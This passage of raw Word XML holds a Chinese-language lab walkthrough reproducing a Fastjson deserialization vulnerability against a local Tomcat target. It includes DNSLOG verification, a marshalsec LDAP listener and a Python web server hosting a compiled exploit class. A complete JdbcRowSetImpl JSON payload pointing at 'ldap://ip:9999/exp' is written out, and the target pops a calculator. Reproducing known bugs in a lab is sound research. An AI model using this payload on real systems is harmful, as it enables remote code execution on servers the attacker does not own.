        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText>INCLUDEPICTURE  "C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\$0$LL</w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText>UOS58YRLKMNX5ORN~5.png" \* MERGEFORMATINET</w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00825154">
        <w:pict w14:anchorId="362AD59A">
          <v:shape id="_x0000_i1027" type="#_x0000_t75" alt="" style="width:394.5pt;height:279.75pt">
            <v:imagedata r:id="rId12" r:href="rId13"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00D427D8">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="52FCA3DF" w14:textId="6401A24E" w:rsidR="00982180" w:rsidRDefault="00982180" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修改为P</w:t>
      </w:r>
      <w:r>
        <w:t>OST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>传数据,在request</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>body中添加我们的json数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CBA33D" w14:textId="60169421" w:rsidR="00982180" w:rsidRPr="00982180" w:rsidRDefault="00982180" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00982180">
        <w:t xml:space="preserve">{"name":"xx","age":"999"} </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B44318F" w14:textId="2C0E7E40" w:rsidR="00982180" w:rsidRPr="00982180" w:rsidRDefault="00982180" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00982180">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00982180">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE "C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\%N05E6O$Z7CPE$ISLBX70]6.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00982180">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:instrText xml:space="preserve"> INCLUDEPICTURE  "C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\%N05E6O$Z7CPE$ISLBX70]6.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText>INCLUDEPICTURE  "C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\115298</w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText>8120\\QQ\\WinTemp\\RichOle\\%N05E6O$Z7CPE$ISLBX70]6.png" \* MERGEFORMATINET</w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00825154">
        <w:pict w14:anchorId="17588DCA">
          <v:shape id="_x0000_i1028" type="#_x0000_t75" alt="" style="width:517.5pt;height:244.5pt">
            <v:imagedata r:id="rId14" r:href="rId15"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r w:rsidR="00D4725F">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00BB42A1">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00982180">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBC64DA" w14:textId="759D6E81" w:rsidR="00982180" w:rsidRPr="00982180" w:rsidRDefault="00982180" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>R</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>esponse为以上数据,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服务正常</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECB1D91" w14:textId="77777777" w:rsidR="00C44D32" w:rsidRDefault="00C44D32" w:rsidP="00421BA8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E228104" w14:textId="2A2C120B" w:rsidR="00421BA8" w:rsidRDefault="00421BA8" w:rsidP="00421BA8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00E71E02">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:r w:rsidR="0081592D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08654119" w14:textId="77777777" w:rsidR="001274F0" w:rsidRDefault="00477780" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>验证漏洞存在:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BCEE42" w14:textId="754237D8" w:rsidR="00477780" w:rsidRDefault="00477780" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:t>OST</w:t>
      </w:r>
      <w:r w:rsidR="00B9152F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下数据,</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B9152F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>datasourcename</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B9152F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地址为我们的D</w:t>
      </w:r>
      <w:r w:rsidR="00B9152F">
        <w:t>NSLOG</w:t>
      </w:r>
      <w:r w:rsidR="00B9152F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D74C97" w14:textId="77777777" w:rsidR="00477780" w:rsidRPr="00477780" w:rsidRDefault="00477780" w:rsidP="004777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7778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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\M8V_UFUJ)I7XEN5V%XF[833.png" \* MERGEFORMATINET </w:instrText>
      </w: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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\M8V_UFUJ)I7XEN5V%XF[833.png" \* MERGEFORMATINET </w:instrText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"C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\M8V_UFUJ)I7XEN5V%XF[833.png"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pict w14:anchorId="7F316407">
          <v:shape id="_x0000_i1029" type="#_x0000_t75" alt="" style="width:291pt;height:133.5pt">
            <v:imagedata r:id="rId16" r:href="rId17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FB58EA6" w14:textId="258E4D0B" w:rsidR="00477780" w:rsidRPr="00477780" w:rsidRDefault="00477780" w:rsidP="004777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7778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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\E`%W]FX9[W$RPETW[30K9PK.png" \* MERGEFORMATINET </w:instrText>
      </w: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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\E`%W]FX9[W$RPETW[30K9PK.png" \* MERGEFORMATINET </w:instrText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"C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\E`%W]FX9[W$RPETW[30K9PK.png"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76CDC96F">
          <v:shape id="_x0000_i1030" type="#_x0000_t75" alt="" style="width:531.75pt;height:144.75pt">
            <v:imagedata r:id="rId18" r:href="rId19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7778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38CAD3" w14:textId="00CC6D93" w:rsidR="00477780" w:rsidRPr="00477780" w:rsidRDefault="007972DE" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用E</w:t>
      </w:r>
      <w:r>
        <w:t>XP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC4A00A" w14:textId="4A6E6A99" w:rsidR="00C44D32" w:rsidRDefault="00C44D32" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="00C44D32">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44D32">
        <w:t>XP</w:t>
      </w:r>
      <w:r w:rsidRPr="00C44D32">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>源代码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5549C05D" w14:textId="1552E37F" w:rsidR="00C44D32" w:rsidRPr="00C44D32" w:rsidRDefault="00C44D32" w:rsidP="00C44D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D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44D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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\@YG6MNVV(_`S}5$P(YM))HA.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C44D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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\@YG6MNVV(_`S}5$P(YM))HA.png" \* MERGEFORMATINET </w:instrText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"C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\@YG6MNVV(_`S}5$P(YM))HA.png"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3B12A4D1">
          <v:shape id="_x0000_i1031" type="#_x0000_t75" alt="" style="width:513pt;height:202.5pt">
            <v:imagedata r:id="rId20" r:href="rId21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44D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8FC51F7" w14:textId="4A34F605" w:rsidR="00C44D32" w:rsidRDefault="008923FC" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译exp得到我们的C</w:t>
      </w:r>
      <w:r>
        <w:t>LASS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0060B3" w14:textId="2FBC3ED2" w:rsidR="00B42E1C" w:rsidRDefault="00B42E1C" w:rsidP="00B42E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2E1C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42E1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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\P]7Y4[DPHXR7IT2%6P32LQG.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00B42E1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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\P]7Y4[DPHXR7IT2%6P32LQG.png" \* MERGEFORMATINET </w:instrText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"C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\P]7Y4[DPHXR7IT2%6P32LQG.png"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pict w14:anchorId="6C75CB2D">
          <v:shape id="_x0000_i1032" type="#_x0000_t75" alt="" style="width:465pt;height:256.5pt">
            <v:imagedata r:id="rId22" r:href="rId23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42E1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459D3C7" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:r>
        <w:t>python搭建一个临时的web服务</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4FFA02" w14:textId="777F40DC" w:rsidR="000E38B8" w:rsidRPr="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意是在采访我们恶意类的位置打开服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C2CDB6" w14:textId="7D73328F" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">  8083</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAF8F9B" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47678D10" w14:textId="5EC03B4B" w:rsidR="000E38B8" w:rsidRPr="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问后应该是这种情况</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50CF8B9D" w14:textId="16DE0032" w:rsidR="000E38B8" w:rsidRDefault="00B42E1C" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24333C95" wp14:editId="71BA65BD">
            <wp:extent cx="5138546" cy="332422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56" cy="333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DB3D" w14:textId="45DB3969" w:rsidR="000E38B8" w:rsidRPr="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="000E38B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>服务器使用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000E38B8">
        <w:t>marshalsec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="000E38B8">
        <w:t>开启LDAP服务监听：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422AA094" w14:textId="3559C79B" w:rsidR="00EF5675" w:rsidRDefault="00EF5675" w:rsidP="00EF5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567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F567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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\~(H48J8IFKG~2Q{5HJ7E9Y9.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EF567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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\~(H48J8IFKG~2Q{5HJ7E9Y9.png" \* MERGEFORMATINET </w:instrText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le\\~(H48J8IFKG~2Q{5HJ7E9Y9.png"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1FACC5BD">
          <v:shape id="_x0000_i1033" type="#_x0000_t75" alt="" style="width:857.25pt;height:185.25pt">
            <v:imagedata r:id="rId25" r:href="rId26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F567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A6E397E" w14:textId="4C911B58" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问我们一开始用tomcat搭建的那个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fstjson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地址,然后用burp</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>抓包并改</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE1FCE1" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75D2E7A4" w14:textId="3763EF59" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>Ip</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是我们用python开启的服务器的I</w:t>
      </w:r>
      <w:r>
        <w:t>P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BEE8D2" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F6AE70" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "name</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="328EB2C4" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "@type":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>java.lang</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.Class</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276CC5E6" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>val</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>com.sun.rowset</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.JdbcRowSetImpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F0C0FB" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3928080B" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    "x</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":{</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4FC963F0" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "@type":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>com.sun.rowset</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.JdbcRowSetImpl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BD523" w14:textId="7DA20B1C" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dataSourceName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>":"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>://ip:9999/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exp</w:t>
      </w:r>
      <w:r>
        <w:t>",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC8F95" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>autoCommit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>":true</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="301D2850" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A04F2A" w14:textId="77777777" w:rsidR="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BC98A7" w14:textId="4609F0C0" w:rsidR="000E38B8" w:rsidRPr="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B505106" w14:textId="5AF15D73" w:rsidR="00723368" w:rsidRPr="00723368" w:rsidRDefault="00723368" w:rsidP="007233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336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72336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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\P4$Z4P}ZS$Y(QI9S$262A]C.png" \* MERGEFORMATINET </w:instrText>
      </w:r>
      <w:r w:rsidRPr="0072336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"C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\P4$Z4P}ZS$Y(QI9S$262A]C.png"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676E3E13">
          <v:shape id="_x0000_i1034" type="#_x0000_t75" alt="" style="width:546pt;height:300.75pt">
            <v:imagedata r:id="rId27" r:href="rId28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2336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F9E2CC9" w14:textId="35042A02" w:rsidR="000E38B8" w:rsidRPr="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38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发送后我们的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marshalsec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会有响应提示我们</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B165D24" w14:textId="504B5A80" w:rsidR="00A27BB9" w:rsidRPr="00A27BB9" w:rsidRDefault="00A27BB9" w:rsidP="00A27B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27BB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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\9CV2G[YUQ{E7IPN}(I}HQVE.png" \* MERGEFORMATINET </w:instrText>
      </w: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p\\RichOle\\9CV2G[YUQ{E7IPN}(I}HQVE.png"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pict w14:anchorId="299959CA">
          <v:shape id="_x0000_i1035" type="#_x0000_t75" alt="" style="width:681pt;height:134.25pt">
            <v:imagedata r:id="rId29" r:href="rId30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E3CD32D" w14:textId="6E53D658" w:rsidR="000E38B8" w:rsidRPr="000E38B8" w:rsidRDefault="000E38B8" w:rsidP="000E38B8">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r w:rsidRPr="000E38B8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们的靶机弹出计算器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A8F83A" w14:textId="2E780AA3" w:rsidR="00B42E1C" w:rsidRPr="000E38B8" w:rsidRDefault="00A27BB9" w:rsidP="000E38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27BB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"C:\\Users\\nsfocus\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\]M(ZCZ]$J23$)@B}B(N5%G5.png" \* MERGEFORMATINET </w:instrText>
      </w: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"C:\\Users\\nsfocus\\Desktop\\AppData\\Roaming\\Tencent\\Users\\1152988120\\QQ\\WinTemp\\RichOle\\]M(ZCZ]$J23$)@B}B(N5%G5.png"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79B634B1">
          <v:shape id="_x0000_i1036" type="#_x0000_t75" alt="" style="width:319.5pt;height:193.5pt">
            <v:imagedata r:id="rId31" r:href="rId32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27BB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21CA113" w14:textId="711EAB28" w:rsidR="00421BA8" w:rsidRDefault="00421BA8" w:rsidP="00421BA8">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>源码分析</w:t>
      </w:r>
      <w:r w:rsidR="0081592D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40991BA3" w14:textId="5B9CB60E" w:rsidR="00C44D32" w:rsidRDefault="00AF6629" w:rsidP="00474F41">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
